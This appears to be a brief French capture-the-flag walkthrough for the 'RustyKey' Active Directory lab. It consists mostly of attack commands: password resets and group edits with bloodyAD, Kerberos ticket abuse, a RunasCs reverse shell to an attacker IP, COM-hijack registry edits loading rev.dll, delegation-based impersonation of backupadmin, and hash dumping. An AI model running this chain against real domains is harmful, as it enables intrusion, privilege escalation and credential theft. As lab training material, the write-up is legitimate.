Nmap Scan

Configuration Kerberos

sudo nano /etc/krb5.conf

BloodHound & Timeroast

bloodhound-python -u $user -p $pass -c All -o bloodhound_$user.json -d rustykey.htb -ns 10.10.11.75 --zip -k
nxc smb IP -M timeroast
    

Chaîne d’exploitation

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'P@ssword123'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'

impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:P@ssword123'
export KRB5CCNAME=BB.MORGAN.ccache
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password bb.morgan 'pa$$w0rd'
bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'Password123!'

.\RunasCs.exe ee.reed Password123! cmd.exe -r 10.10.14.31:9001
reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f
Powershell
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
    

Impersonation & Dump

impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.129.65.227 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\shell.dll" /f
    

Dump des NTLM hashes, SYSTEM, SAM avec secretsdump ou mimikatz.

Remerciements

Thanks, Artemis Community 🛡️